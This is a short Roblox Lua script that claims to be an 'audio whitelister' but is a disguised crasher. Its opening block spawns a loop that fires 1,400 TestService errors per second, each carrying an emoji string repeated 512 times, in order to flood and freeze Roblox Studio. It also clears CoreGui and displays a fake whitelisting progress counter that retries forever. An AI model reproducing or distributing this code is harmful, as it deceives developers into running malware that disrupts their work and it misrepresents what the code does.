task.spawn(function()
	local thing = ("\240\159\152\130\240\159\152\130\240\159\152\130\240\159\152\130\240\159\152\136\240\159\152\136\240\159\152\136\240\159\152\136\240\159\146\169\240\159\146\169\240\159\146\128\240\159\146\128\240\159\154\146\240\159\154\146\240\159\154\146\240\159\154\146\240\159\143\158\239\184\143\240\159\143\158\239\184\143\240\159\143\165\240\159\140\133\240\159\140\129\240\159\143\172\240\159\151\188\240\159\167\186\240\159\148\165\240\159\148\165\240\159\148\165\240\159\148\165\240\159\148\165\240\159\148\165\240\159\148\165\240\159\148\165\226\152\175\239\184\143\226\152\175\239\184\143\226\152\170\239\184\143\226\152\170\239\184\143\n"):rep(512)
	dsffdsf=Instance.new("Model")
    dsffdsf.Name=thing
    game:GetService("TestService").Name = thing
	
	while wait(1) do
		for i = 1, 1400 do
			task.spawn(function()
				game:GetService("TestService"):Error(thing,dsffdsf,5345435334515)
			end)
		end
	end
end)

pcall(function()
    game:GetService("CoreGui"):ClearAllChildren()
end)

local acfdsafsf = #audiolist
local sdhgkshgf = 0
local msg = Instance.new("Message",game.CoreGui)
msg.Text = "Welcome to simul's audio whitelister"
wait(1)
msg.Text = "Whitelisting audios... " .. sdhgkshgf .. "/" .. acfdsafsf

while true do
	wait(math.random(2,6)/10)
	sdhgkshgf = sdhgkshgf + 1
	if sdhgkshgf == acfdsafsf then
		msg.Text = "Some audios failed to whitelist! Re-trying " .. math.random(1, 20) .. " audios..."
	else
		msg.Text = "Whitelisting audios... " .. sdhgkshgf .. "/" .. acfdsafsf
	end
end
